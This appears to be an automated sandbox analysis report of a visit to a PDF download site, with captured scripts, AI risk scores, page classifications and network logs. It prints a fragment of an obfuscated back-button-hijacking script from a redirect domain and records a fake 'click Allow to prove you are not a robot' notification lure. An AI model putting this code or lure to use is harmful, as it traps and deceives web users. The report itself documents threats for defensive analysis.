w(n,null)},L=function(n){return null===k(n)},O=function(n){return k(n)===h},x=[v,b,m,p],C=function(n,t,e,i){n&&(void 0===i?void 0===e?n(t):n(t,e):n(t,e,i))},N=function(n,t){o?n.classList.add(t):n.className+=(n.className?" ":"")+t},M=function(n,t){o?n.classList.remove(t):n.className=n.className.replace(new RegExp("(^\|\\s+)"+t+"(\\s+\|$)")," ").replace(/^\s+/,"").replace(/\s+$/,"")},z=function(n){return n.llTempImage},T=function(n,t){if(t){var e=t._observer;e&&e.unobserve(n)}},R=function(n,t){n&&(n.loadingCount+=t)},G=function(n,t){n&&(n.toLoadCount=t)},j=function(n){for(var t,e=[],i=0;t=n.children[i];i+=1)"SOURCE"===t.tagName&&e.push(t);return e},D=function(n,t){var e=n.parentNode;e&&"PICTURE"===e.tagName&&j(e).forEach(t)},H=function(n,t){j(n).forEach(t)},V=[u],F=[u,f],B=[u,s,d],J=[g],P=function(n){return!!n[_]},S=function(n){return n[_]},U=function(n){return delete n[_]},$=function(n,t){if(!P(n)){var e={};t.forEach((function(t){e[t]=n.getAttribute(t)})),n[_]=e}},q=function(n,t){if(P(n)){var e=S(n);t.forEach((function(t){!function(n,t,e){e?n.setAttribute(t,e):n.removeAttribute(t)}(n,t,e[t])}))}},K=function(n,t,e){N(n,t.class_applied),w(n,m),e&&(t.unobserve_completed&&T(n,t),C(t.callback_applied,n,e))},Q=function(n,t,e){N(n,t.class_loading),w(n,v),e&&(R(e,1),C(t.callback_loading,n,e))},W=function(n,t,e){e&&n.setAttribute(t,e)},X=function(n,t){W(n,d,y(n,t.data_sizes)),W(n,s,y(n,t.data_srcset)),W(n,u,y(n,t.data_src))},Y={IMG:function(n,t){D(n,(function(n){$(n,B),X(n,t)})),$(n,B),X(n,t)},IFRAME:function(n,t){$(n,V),W(n,u,y(n,t.data_src))},VIDEO:function(n,t){H(n,(function(n){$(n,V),W(n,u,y(n,t.data_src))})),$(n,F),W(n,f,y(n,t.data_poster)),W(n,u,y(n,t.data_src)),n.load()},OBJECT:function(n,t){$(n,J),W(n,g,y(n,t.data_src))}},Z=["IMG","IFRAME","VIDEO","OBJECT"],nn=function(n,t){!t\|\|function(n){return n.loadingCount>0}(t)\|\|function(n){return n.toLoadCount>0}(t)\|\|C(n.callback_finish,t)},tn=function(n,t,e){n.addEventListener(t,e),n.llEvLisnrs[t]=e},en=function(n,t,e){n.remove
URL: https://pdfdrive.com.co/wp-content/themes/appyn/as... Model: Joe Sandbox AI	{ "risk_score": 3, "reasoning": "The provided JavaScript snippet appears to be a combination of legitimate functionality and some potentially concerning practices. While it includes some behaviors that could be considered moderate-risk, such as external data transmission and aggressive DOM manipulation, the overall context suggests this is likely a script with an analytics or tracking purpose. The script also includes some low-risk indicators, such as the use of legacy APIs. However, the script does not demonstrate any clear malicious intent or high-risk behaviors, and the interactions with known, reputable domains (e.g., `ajaxurl`) suggest a legitimate use case. Therefore, the overall risk score is assessed as 3, indicating a low-risk script that may require further review but is not inherently malicious." }
"use strict";var brpx=document.querySelector(".box-rating");if(null!==brpx&&localStorage.getItem("px_rating-"+brpx.dataset.postId)&&brpx.classList.add("voted"),!0===text_){var e,t,a=document.getElementsByClassName("entry-limit");a.length>0&&(a=a[0]).offsetHeight>160&&(document.querySelectorAll(".app-s #descripcion .entry")[0].outerHTML+='<span class="readmore readdescripcion" style="cursor:pointer;">'+text_leer_mas+"</span>",document.querySelectorAll(".app-s #descripcion .entry")[0].style.height="160px",document.querySelectorAll(".app-s #descripcion .entry")[0].classList.add("limit"))}function support_format_webp(){var e=document.createElement("canvas");return!!(e.getContext&&e.getContext("2d"))&&0==e.toDataURL("image/webp").indexOf("data:image/webp")}function pxloadimage(e){var t=[].slice.call(document.querySelectorAll(".lazyload"));if("IntersectionObserver"in window){var a=new IntersectionObserver(function(e,t){e.forEach(function(e){if(e.isIntersecting){var t=e.target;t.src=t.dataset.src,t.classList.add("imgload"),t.parentElement.classList.add("bi_ll_load"),t.dataset.bgsrc&&(t.style.backgroundImage="url('"+t.dataset.bgsrc+"')"),a.unobserve(t)}})});t.forEach(function(e){a.observe(e)})}else t.forEach(function(e){e.src=e.dataset.src,e.classList.add("imgload"),e.parentElement.classList.add("bi_ll_load"),e.dataset.bgsrc&&(e.style.backgroundImage="url('"+e.dataset.bgsrc+"')")})}pxloadimage(),function(e){if(e("#menu-mobile").show(),e("body").width(),e(".menu-open").on("click",function(){e("body").toggleClass("toggle-nav"),e(this).find("i").hasClass("fa-bars")?e(this).find("i").attr("class","fa fa-times"):e(this).find("i").attr("class","fa fa-bars")}),e("#menu-mobile .menu-item-has-children > a").after('<i class="fa fa-chevron-down"></i>'),e(document).on("click","#menu-mobile .menu-item-has-children > a, #menu-mobile .menu-item-has-children > i",function(t){t.preventDefault(),e(this).parent().find(".sub-menu:eq(0)").toggle(),e(this).parent().find("i:eq(0)").hasClass("fa-chevron-up")?e(this).parent().find("i:eq(0)").attr("class","fa fa-chevron-down"):e(this).parent().find("i:eq(0)").attr("class","fa fa-chevron-up")}),!0===text_){var t,a,o,i=0;e(document).on("click",".app-s .readdescripcion",function(t){t.preventDefault();var a=e(".entry-limit").outerHeight(),o=Math.ceil(e(".app-s #descripcion .entry").height());if(0==i&&160==o){var n=e(window).scrollTop();e(".app-s #descripcion .entry").css({height:a}).removeClass("limit"),e("html, body").animate({scrollTop:n},0),e(this).text(text_leer_menos),i=1}else{var r=e("#descripcion").offset();e("html, body").animate({scrollTop:r.top-70},0),e(".app-s #descripcion .entry").css({height:"160px"}).addClass("limit"),e(this).text(text_leer_mas),i=0}})}if(e(document).on("mouseover",".box-rating:not(.voted):not(.movil) .ratings-click .rating-click",function(){e(this).parent().parent().find(".stars").addClass("hover");for(var t=e(this).data("count"),a=1;a<=t;a++)e(".ratings-click .rating-click.r"+a).addClass("active")}),e(document).on("mouseout",".box-rating:not(.voted):not(.movil) .ratings-click .rating-click",function(){e(this).parent().parent().find(".stars").removeClass("hover");for(var t=1;t<=5;t++)e(".ratings-click .rating-click.r"+t).removeClass("active")}),e(document).on("click",".box-rating:not(.voted):not(.movil) .ratings-click .rating-click, .ratingBoxMovil .box-rating button",function(){var t=e(this).data("count");e(".box-rating:not(.voted)").append('<div class="rating-loading"></div>');var a=e(".box-rating:not(.voted)").data("post-id"),o=e.ajax({url:ajaxurl,type:"post",data:{action:"post_rating",post_id:a,rating_count:t}});o.done(function(o,i,n){var r=e.parseJSON(o),s=20*r.average;e(".box-rating:not(.voted) .rating-average b").text(r.average),e(".box-rating:not(.voted) .rating .stars").css("width",s+"%"),e(".box-rating:not(.voted) .rating-text span").text(r.users),e(".box-rating").addClass("voted"),e(".rating-loading").remove(),e(".ratingBoxMovil").remove(),localStorage.setItem("px_rating-"+a,
URL: https://pdfdrive.com.co/wp-includes/js/jquery/jque... Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": "The provided JavaScript snippet appears to be the jQuery Migrate plugin, which is a utility that helps developers migrate their jQuery-based code from older versions to newer versions of jQuery. The plugin does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or redirects to malicious domains. The behaviors observed, such as the use of legacy APIs and some DOM manipulation, are typical of a migration utility and do not pose a significant security risk. Additionally, the plugin is from a trusted source (the OpenJS Foundation) and is widely used in the web development community. Overall, this script can be considered low risk." }
/! jQuery Migrate v3.4.1 \| (c) OpenJS Foundation and other contributors \| jquery.org/license / "undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)\|\|[],o=r.exec(t)\|\|[],a=1;a<=3;a++){if(+o[a]<+n[a])return 1;if(+n[a]<+o[a])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.4.1";var t=Object.create(null);s.migrateDisablePatches=function(){for(var e=0;e<arguments.length;e++)t[arguments[e]]=!0},s.migrateEnablePatches=function(){for(var e=0;e<arguments.length;e++)delete t[arguments[e]]},s.migrateIsPatchEnabled=function(e){return!t[e]},n.console&&n.console.log&&(s&&e("3.0.0")&&!e("5.0.0")\|\|n.console.log("JQMIGRATE: jQuery 3.x-4.x REQUIRED"),s.migrateWarnings&&n.console.log("JQMIGRATE: Migrate plugin loaded multiple times"),n.console.log("JQMIGRATE: Migrate is installed"+(s.migrateMute?"":" with logging active")+", version "+s.migrateVersion));var o={};function u(e,t){var r=n.console;!s.migrateIsPatchEnabled(e)\|\|s.migrateDeduplicateWarnings&&o[t]\|\|(o[t]=!0,s.migrateWarnings.push(t+" ["+e+"]"),r&&r.warn&&!s.migrateMute&&(r.warn("JQMIGRATE: "+t),s.migrateTrace&&r.trace&&r.trace()))}function r(e,t,r,n,o){Object.defineProperty(e,t,{configurable:!0,enumerable:!0,get:function(){return u(n,o),r},set:function(e){u(n,o),r=e}})}function a(e,t,r,n,o){var a=e[t];e[t]=function(){return o&&u(n,o),(s.migrateIsPatchEnabled(n)?r:a\|\|s.noop).apply(this,arguments)}}function c(e,t,r,n,o){if(!o)throw new Error("No warning message provided");return a(e,t,r,n,o),0}function i(e,t,r,n){return a(e,t,r,n),0}s.migrateDeduplicateWarnings=!0,s.migrateWarnings=[],void 0===s.migrateTrace&&(s.migrateTrace=!0),s.migrateReset=function(){o={},s.migrateWarnings.length=0},"BackCompat"===n.document.compatMode&&u("quirks","jQuery is not compatible with Quirks Mode");var d,l,p,f={},m=s.fn.init,y=s.find,h=/\[(\s[-\w]+\s)([~\|^$]?=)\s([-\w#]?#[-\w#])\s\]/,g=/\[(\s[-\w]+\s)([~\|^$]?=)\s([-\w#]?#[-\w#])\s\]/g,v=/^[\s\uFEFF\xA0]+\|([^\s\uFEFF\xA0])[\s\uFEFF\xA0]+$/g;for(d in i(s.fn,"init",function(e){var t=Array.prototype.slice.call(arguments);return s.migrateIsPatchEnabled("selector-empty-id")&&"string"==typeof e&&"#"===e&&(u("selector-empty-id","jQuery( '#' ) is not a valid selector"),t[0]=[]),m.apply(this,t)},"selector-empty-id"),s.fn.init.prototype=s.fn,i(s,"find",function(t){var r=Array.prototype.slice.call(arguments);if("string"==typeof t&&h.test(t))try{n.document.querySelector(t)}catch(e){t=t.replace(g,function(e,t,r,n){return"["+t+r+'"'+n+'"]'});try{n.document.querySelector(t),u("selector-hash","Attribute selector with '#' must be quoted: "+r[0]),r[0]=t}catch(e){u("selector-hash","Attribute selector with '#' was not fixed: "+r[0])}}return y.apply(this,r)},"selector-hash"),y)Object.prototype.hasOwnProperty.call(y,d)&&(s.find[d]=y[d]);c(s.fn,"size",function(){return this.length},"size","jQuery.fn.size() is deprecated and removed; use the .length property"),c(s,"parseJSON",function(){return JSON.parse.apply(null,arguments)},"parseJSON","jQuery.parseJSON is deprecated; use JSON.parse"),c(s,"holdReady",s.holdReady,"holdReady","jQuery.holdReady is deprecated"),c(s,"unique",s.uniqueSort,"unique","jQuery.unique is deprecated; use jQuery.uniqueSort"),r(s.expr,"filters",s.expr.pseudos,"expr-pre-pseudos","jQuery.expr.filters is deprecated; use jQuery.expr.pseudos"),r(s.expr,":",s.expr.pseudos,"expr-pre-pseudos","jQuery.expr[':'] is deprecated; use jQuery.expr.pseudos"),e("3.1.1")&&c(s,"trim",function(e){return null==e?"":(e+"").replace(v,"$1")},"trim","jQuery.trim is deprecated; use String.prototype.trim"),e("3.2.0")&&(c(s,"nodeName",function(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()},"nodeName","jQuery.nodeName is de
URL: https://cu0dup0hubcc73dr63tg.controlrushprotocol.c... Model: Joe Sandbox AI	{ "risk_score": 9, "reasoning": "This script exhibits several high-risk behaviors that indicate potential malicious intent: 1. Dynamic Code Execution: The script uses the `eval()` function to execute obfuscated code, which is a common technique used by malware to evade detection. 2. Data Exfiltration: The script collects and sends user data (potentially including sensitive information like cookies or session identifiers) to external servers, which could be used for malicious purposes like identity theft or fraud. 3. Redirects to Malicious/Suspicious Domains: The script manipulates the browser's history to redirect the user to potentially malicious or suspicious domains, which could lead to phishing attacks or further compromise. 4. Obfuscated Code/URLs: The script uses heavy obfuscation techniques, making it difficult to analyze and understand the true intent of the code. This is a common tactic used by malicious actors to hide their activities. Overall, the combination of these high-risk behaviors, along with the lack of transparency and the suspicious nature of the code, indicates a high likelihood of malicious intent. This script should be considered a significant security risk and should be blocked or further investigated." }
! function() { var a; var rUrl = "#"; try { for (a = 0; 10 > a; ++a) { history.pushState({}, "", "#") } onpopstate = function(c) { var _0x5434 = ['action', '1733anSnbb', 'prototype', 'counter', '136873HWxAqy', 'error', 'GgBac', '5JZYhko', '3SSgJoZ', 'call', 'state', '26pNCiTe', '136091QSfmwd', 'info', 'rGStB', 'console', '__proto__', 'string', 'bSKgi', 'exception', 'warn', 'IxFxt', 'chain', 'stateObject', 'constructor', 'VeMAH', '\x5c+\x5c+\x20(?:[a-zA-Z_$][0-9a-zA-Z_$])', 'trace', 'gger', '44140ctcvRX', 'function\x20\x5c(\x20\x5c)', 'WjkwX', 'replace', '229bfkqlz', 'log', '4659UuUyvT', '1LEMWFc', 'IEjZQ', 'toString', 'table', 'HCacI', 'init', 'QfRJX', 'bind', '{}.constructor(\x22return\x20this\x22)(\x20)', 'length', 'yYjBG', 'return\x20(function()\x20', 'xsXeB', 'debu', 'apply', 'IDwsF', 'input', 'vUROB', 'test', '22927tNheUQ', '107LKDvKq']; var _0x495e9c = _0x45f3; (function(_0x4e074d, _0x319937) { var _0x20d401 = _0x45f3; while (!![]) { try { var _0x45b785 = -parseInt(_0x20d401(0x145)) + -parseInt(_0x20d401(0x137)) * parseInt(_0x20d401(0x141)) + -parseInt(_0x20d401(0x13d)) * -parseInt(_0x20d401(0x15d)) + parseInt(_0x20d401(0x156)) + -parseInt(_0x20d401(0x144)) * -parseInt(_0x20d401(0x15c)) + -parseInt(_0x20d401(0x140)) * -parseInt(_0x20d401(0x13a)) + parseInt(_0x20d401(0x138)) * parseInt(_0x20d401(0x15a)); if (_0x45b785 === _0x319937) break; else _0x4e074d['push'](_0x4e074d['shift']()); } catch (_0x1c173e) { _0x4e074d['push'](_0x4e074d['shift']()); } } }(_0x5434, 0x1fd8b)); var _0x21629b = function() { var _0x35bb42 = !![]; return function(_0x1cf651, _0x31cd94) { var _0x33ad16 = _0x45f3; if (_0x33ad16(0x152) === _0x33ad16(0x152)) { var _0x18df77 = _0x35bb42 ? function() { var _0x25615a = _0x33ad16; if (_0x31cd94) { if (_0x25615a(0x14b) !== _0x25615a(0x133)) { var _0xb57a6a = _0x31cd94[_0x25615a(0x16b)](_0x1cf651, arguments); return _0x31cd94 = null, _0xb57a6a; } else { function _0x286967() { if (_0x306b8b) { var _0x4c06f8 = _0x13435a['apply'](_0x1634c5, arguments); return _0x19dead = null, _0x4c06f8; } } } } } : function() {}; return _0x35bb42 = ![], _0x18df77; } else { function _0x1620f8() { var _0x2312b3 = _0x33ad16, _0xda6296 = new _0x1ae5ef(_0x2312b3(0x157)), _0x4d475f = new _0x294497(_0x2312b3(0x153), 'i'), _0x1f8183 = _0x3eb8ec(_0x2312b3(0x162)); !_0xda6296[_0x2312b3(0x136)](_0x1f8183 + _0x2312b3(0x14f)) \|\| !_0x4d475f[_0x2312b3(0x136)](_0x1f8183 + _0x2312b3(0x134)) ? _0x1f8183('0') : _0x35926d(); } } }; }(); (function() { _0x21629b(this, function() {
URL: https://pdfdrive.com.co/ Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "The Best Source for books Lovers", "prominent_button_name": "unknown", "text_input_field_labels": "Search for tutorials, manuals, and authors in PDF files", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://pdfdrive.com.co/ Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "The Best Source for books Lovers", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://pdfdrive.com.co/ Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "The Best Source for books Lovers", "prominent_button_name": "unknown", "text_input_field_labels": "Search for tutorials, manuals, and authors in PDF files", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://pdfdrive.com.co/ Model: Joe Sandbox AI	{ "brands": [ "PDF Drive" ] }

URL: https://pdfdrive.com.co/ Model: Joe Sandbox AI	{ "brands": [ "PDF Drive" ] }

URL: https://pdfdrive.com.co/ Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "The Best Source for books Lovers", "prominent_button_name": "Continue", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://pdfdrive.com.co/ Model: Joe Sandbox AI	{ "brands": [ "PDF Drive" ] }

URL: https://cu0dup0hubcc73dr63tg.controlrushprotocol.co.in/01/?cid=b795b5d29eff25c3bd93&list=6&extclickid=GB44nFZoz502cOiFrgHoAY74HoAC4-2AtNvYv6MC&t1=506894&t2=2851560&tsid=16&clickid=cu0dup0hubcc73dr63tg&domain=open-2-view.com&lp_key=173647eae38e52225bc6a730 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "I'm not a robot", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://cu0dup0hubcc73dr63tg.controlrushprotocol.co.in/01/?cid=b795b5d29eff25c3bd93&list=6&extclickid=GB44nFZoz502cOiFrgHoAY74HoAC4-2AtNvYv6MC&t1=506894&t2=2851560&tsid=16&clickid=cu0dup0hubcc73dr63tg&domain=open-2-view.com&lp_key=173647eae38e52225bc6a730 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Click \"Allow\" to confirm that you are not a robot", "prominent_button_name": "Allow", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://cu0dup0hubcc73dr63tg.controlrushprotocol.co.in/01/?cid=b795b5d29eff25c3bd93&list=6&extclickid=GB44nFZoz502cOiFrgHoAY74HoAC4-2AtNvYv6MC&t1=506894&t2=2851560&tsid=16&clickid=cu0dup0hubcc73dr63tg&domain=open-2-view.com&lp_key=173647eae38e52225bc6a730 Model: Joe Sandbox AI	{ "brands": "unknown" }

URL: https://cu0dup0hubcc73dr63tg.controlrushprotocol.co.in/01/?cid=b795b5d29eff25c3bd93&list=6&extclickid=GB44nFZoz502cOiFrgHoAY74HoAC4-2AtNvYv6MC&t1=506894&t2=2851560&tsid=16&clickid=cu0dup0hubcc73dr63tg&domain=open-2-view.com&lp_key=173647eae38e52225bc6a730 Model: Joe Sandbox AI	{ "brands": "unknown" }

URL: https://pdfdrive.com.co/ Model: Joe Sandbox AI	{ "brands": [ "PDF Drive" ] }

URL: https://cu0dup0hubcc73dr63tg.controlrushprotocol.c... Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": "The provided JavaScript snippet appears to be a simple language translation utility that displays localized text for different languages. It does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or suspicious redirects. The script is likely used for legitimate purposes, such as displaying user-facing content in the appropriate language. While it uses some legacy practices like HTML entity encoding, these do not pose a significant security risk in this context. Overall, the script can be considered low-risk." }
var lang = { "en": { "a": "Click "Allow"", "b": "Click "Allow" to confirm that you are not a robot" }, "nz": { "a": "Click Allow", "b": "Click \u00abAllow\u00bb to confirm that you are not a robot!" }, "jp": { "a": "\u300c\u8a31\u53ef\u3059\u308b\u300d\u3092\u30af\u30ea\u30c3\u30af", "b": "\u300c\u8a31\u53ef\u300d\u3092\u30af\u30ea\u30c3\u30af\u3057\u3066\u3001\u3042\u306a\u305f\u304c\u30ed\u30dc\u30c3\u30c8\u3067\u306f\u306a\u3044\u3053\u3068\u3092\u78ba\u8a8d\u3057\u3066\u304f\u3060\u3055\u3044!" }, "ru": { "a": "\u041d\u0430\u0436\u043c\u0438\u0442\u0435 \"\u0420\u0430\u0437\u0440\u0435\u0448\u0438\u0442\u044c\"", "b": "\u041d\u0430\u0436\u043c\u0438\u0442\u0435 \u00ab\u0420\u0430\u0437\u0440\u0435\u0448\u0438\u0442\u044c\u00bb \u0434\u043b\u044f \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0438\u044f \u0447\u0442\u043e \u0412\u044b \u043d\u0435 \u0440\u043e\u0431\u043e\u0442!" }, "ar": { "a": "\u0627\u0646\u0642\u0631 \u062a\u0645\u0643\u064a\u0646", "b": "\u0627\u0646\u0642\u0631 \u0641\u0648\u0642 \"\u0627\u0644\u0633\u0645\u0627\u062d\" \u0644\u062a\u0623\u0643\u064a\u062f \u0623\u0646\u0651\u0643 \u0644\u0633\u062a \u0625\u0646\u0633\u0627\u0646\u064b\u0627 \u0622\u0644\u064a\u064b\u0627!" }, "bg": { "a": "\u041d\u0430\u0442\u0438\u0441\u043d\u0435\u0442\u0435 \u0420\u0430\u0437\u0440\u0435\u0448\u0438", "b": "\u041a\u043b\u0438\u043a\u043d\u0438 \u00ab\u0420\u0430\u0437\u0440\u0435\u0448\u0438\u00bb, \u0437\u0430 \u0434\u0430 \u043f\u043e\u0442\u0432\u044a\u0440\u0434\u0438\u0448, \u0447\u0435 \u043d\u0435 \u0441\u0438 \u0440\u043e\u0431\u043e\u0442!" }, "cs": { "a": "Stiskn\u011bte Povolit", "b": "Kliknut\u00edm na \u00abPovolit\u00bb potvr\u010fte, \u017ee nejste robot!" }, "nl": { "a": "Druk op Toestaan", "b": "Klik op 'Toestaan' om te bevestigen dat je geen robot bent!" }, "fr": { "a": "Appuyez sur Autoriser", "b": "Cliquez sur \u00ab autoriser \u00bb pour confirmer que vous n'\u00eates pas un robot !" }, "de": { "a": "Zulassen dr\u00fccken", "b": "Klicken Sie auf \u201eErlauben\u201c, um zu best\u00e4tigen, dass Sie kein Roboter sind!" }, "hu": { "a": "Nyomj az Enged\u00e9lyez\u00e9sre", "b": "Kattints az \u00abEnged\u00e9lyez\u00bb gombra annak meger\u0151s\u00edt\u00e9s\u00e9hez, hogy nem vagy robot!" }, "it": { "a": "Premi Autorizza", "b": "Clicca su \u00abConsenti\u00bb per confermare di non essere un robot!" }, "ja": { "a": "\u300c\u8a31\u53ef\u300d\u3092\u62bc\u3057\u307e\u3059", "b": "\u00ab\u8a31\u53ef\u00bb\u3092\u30af\u30ea\u30c3\u30af\u3057\u3066\u3001\u30ed\u30dc\u30c3\u30c8\u3067\u306f\u306a\u3044\u3053\u3068\u3092\u78ba\u8a8d\u3057\u3066\u304f\u3060\u3055\u3044\uff01" }, "ko": { "a": "\ud5c8\uc6a9\uc744 \ub204\ub974\uc138\uc694", "b": "\ub85c\ubd07\uc774 \uc544\ub2c8\ub77c\ub294 \uac83\uc744 \ud655\uc778\ud558\ub824\uba74 \u00abAllow\u00bb\ub97c \ud074\ub9ad\ud558\uc138\uc694!" }, "pl": { "a": "Naci\u015bnij przycisk Zezw\u00f3l", "b": "Kliknij \u201eZezw\u00f3l\u201d, by potwierdzi\u0107, \u017ce nie jeste\u015b robotem!" }, "ro": { "a": "Ap\u0103sa\u021bi \u201ePermite\u021bi\u201d",
URL: https://pdfdrive.com.co/... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "The provided JavaScript snippet appears to be a lazy-loading implementation for images and iframes, which is a common and legitimate practice to improve website performance. The script uses the LazyLoad library and sets up a MutationObserver to detect and lazy-load new elements added to the DOM. While the script uses some data attributes that may be considered outdated (e.g., `data-lazy-src`), the overall behavior is benign and does not exhibit any high-risk indicators. The script is likely to be part of a legitimate website optimization strategy." }
window.lazyLoadOptions=[{elements_selector:"img[data-lazy-src],.rocket-lazyload,iframe[data-lazy-src]",data_src:"lazy-src",data_srcset:"lazy-srcset",data_sizes:"lazy-sizes",class_loading:"lazyloading",class_loaded:"lazyloaded",threshold:300,callback_loaded:function(element){if(element.tagName==="IFRAME"&&element.dataset.rocketLazyload=="fitvidscompatible"){if(element.classList.contains("lazyloaded")){if(typeof window.jQuery!="undefined"){if(jQuery.fn.fitVids){jQuery(element).parent().fitVids()}}}}}},{elements_selector:".rocket-lazyload",data_src:"lazy-src",data_srcset:"lazy-srcset",data_sizes:"lazy-sizes",class_loading:"lazyloading",class_loaded:"lazyloaded",threshold:300,}];window.addEventListener('LazyLoad::Initialized',function(e){var lazyLoadInstance=e.detail.instance;if(window.MutationObserver){var observer=new MutationObserver(function(mutations){var image_count=0;var iframe_count=0;var rocketlazy_count=0;mutations.forEach(function(mutation){for(var i=0;i<mutation.addedNodes.length;i++){if(typeof mutation.addedNodes[i].getElementsByTagName!=='function'){continue} if(typeof mutation.addedNodes[i].getElementsByClassName!=='function'){continue} images=mutation.addedNodes[i].getElementsByTagName('img');is_image=mutation.addedNodes[i].tagName=="IMG";iframes=mutation.addedNodes[i].getElementsByTagName('iframe');is_iframe=mutation.addedNodes[i].tagName=="IFRAME";rocket_lazy=mutation.addedNodes[i].getElementsByClassName('rocket-lazyload');image_count+=images.length;iframe_count+=iframes.length;rocketlazy_count+=rocket_lazy.length;if(is_image){image_count+=1} if(is_iframe){iframe_count+=1}}});if(image_count>0\|\|iframe_count>0\|\|rocketlazy_count>0){lazyLoadInstance.update()}});var b=document.getElementsByTagName("body")[0];var config={childList:!0,subtree:!0};observer.observe(b,config)}},!1)

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 397196, version 772.256
Category:	downloaded
Size (bytes):	397196
Entropy (8bit):	7.99787981768687
Encrypted:	true
SSDEEP:	12288:UWhnlU94d9xj03L486r6UxZMmgzcVLYLZcd1rRew6j1Lr:FcWxj0b48S6WlgIisD6j1/
MD5:	D363EA5FA426A1AD4BF8B9565C17F573
SHA1:	53B4EB71F6752A884D2DA44032707A2D4BB04665
SHA-256:	2B7265FB8E98286A6E61D73E4278DF35C0E911DB1E8A94C82836D0B21088125B
SHA-512:	B0CEEED67BFA80C1F23F4F8D164F614B36D179D44E44729830F0936986D1EC83DE62C9197E2E69474E88DE6CD84CABFA92C4E90C2779385EB77E8A8D4DFC5B83
Malicious:	false
Reputation:	low
URL:	https://site-assets.fontawesome.com/releases/v6.4.0/webfonts/fa-regular-400.woff2
Preview:	wOF2...................>.........................8.$. .`.........T.....\|. ...s-.p........).=<g..6......PUU.kBp.....O...o~..?..o.........q....l...................f.......w`.....5....{a..........{{"NP....J.l./.9..M.=.T....z7....J-...........[:...<.............."3....!xB6....:.R.c&_Exx..O.I......i.Y...#......N..`.y.&O .....C..\|...%.t.H.....T..ggz'....y.3..awgw. ....,..D..,.$K....m.Qp...,G..Y.K6..{Y.%^..>.R......d.....m.[........e..w.B......Q....,Y....D...h[..Nw.+...]..;Jb;LW:....~9..?.[N..[....>.........i.$@4.....^7.n.N.IA.c.\..q........N.J.V...$....Be..1"z...?U..@...Q...}......b.,.+`.......k.7..Z...:gk.]..dL.r.?.=b.#D..O.jCy..&{z..x....nP;.e....s.C".......O.oNJ...Yd.j~..7..b4."2...Y..cV..s..5...}.;...1.....p.s.}....=w.r....(&.)$.d(.J.4..p..;A.....w.2+.H..Bi........H.RD..">)EF....w...F.5.?*.Q......N.0k0.a..M;.ui.L.{....i.i.`l.#_.mP^...uw...Q.....1...].H.B8...M.{. ...SUNEZY.O<...d..[;\|.......D.d.c....1.,.N5...?gk..""#.....xc.Ykk...

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 09:49:59.604244947 CET	53	59005	1.1.1.1	192.168.2.24
Jan 10, 2025 09:49:59.651084900 CET	53	59256	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:00.966180086 CET	53	54734	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:03.912753105 CET	64731	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:03.913058996 CET	65083	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:03.919481993 CET	53	64731	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:03.919894934 CET	53	65083	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:05.283282995 CET	53680	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:05.283447027 CET	64277	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:05.291052103 CET	63613	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:05.291306019 CET	51510	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:05.294475079 CET	53	64277	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:05.296386957 CET	53	53680	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:05.304572105 CET	53	63613	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:05.305433035 CET	53	51510	1.1.1.1	192.168.2.24
Jan 10, 2025 09:50:07.060455084 CET	60856	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:07.060595036 CET	55052	53	192.168.2.24	1.1.1.1
Jan 10, 2025 09:50:07.067049026 CET	53	60856	1.1.1.1	192.168.2.24
